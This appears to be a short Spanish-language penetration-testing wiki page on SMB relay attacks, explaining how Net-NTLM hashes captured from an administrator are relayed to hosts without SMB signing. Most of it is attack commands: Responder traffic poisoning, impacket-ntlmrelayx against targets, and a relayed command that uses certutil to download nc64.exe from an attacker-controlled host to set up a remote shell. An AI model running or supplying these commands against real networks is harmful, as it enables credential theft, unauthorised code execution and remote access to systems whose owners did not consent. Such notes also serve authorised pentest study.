SMB Relay
SMB Signing -> False
Descripción
Este ataque consiste en capturar los hashes Net-NTLM de un cliente, reenviarlos a un segundo cliente, permitiendonos actuar como si fuesemos el primer cliente. Debido a que el primer cliente es un usuario administrador, podremos ejecutar comandos o ganar una shell en el segundo cliente.
Para poder hacer el relaying el cliente del que capturemos los hashes Net-NTLM deberá pertenecer al grupo local de administradores sobre el cual vamos a querer ejecutar comandos y que el SMB signing esté desactivado.

/usr/share/responder/Responder.Conf:
Explotación
Envenenar el tráfico con responder:
python Responder.py -I eth0 -dw
Empezar el ataque con ntlmrelayx
# con elbinario de impacket que viene en kali
impacket-ntlmrelayx -t (ip-target) -smb2support # el -smb2support es para versiones posteriores a WindowsServer 2008
impacket-ntlmrelayx -t 192.168.0.110 -smb2support
impacket-ntlmrelayx -tf targets.txt -smb2support
# ejecutar comandos
impacket-ntlmrelayx -t 192.168.0.110 -c "certutil.exe -f -urlcache -split http://192.168.0.108:9090/nc64.exe C:\\Windows\\Temp\\nc.exe" -smb2support
Cliente 1 con privilegios de administrador en el cliente 2:

Hashes dumpeados con ntlmrelayx

Last updated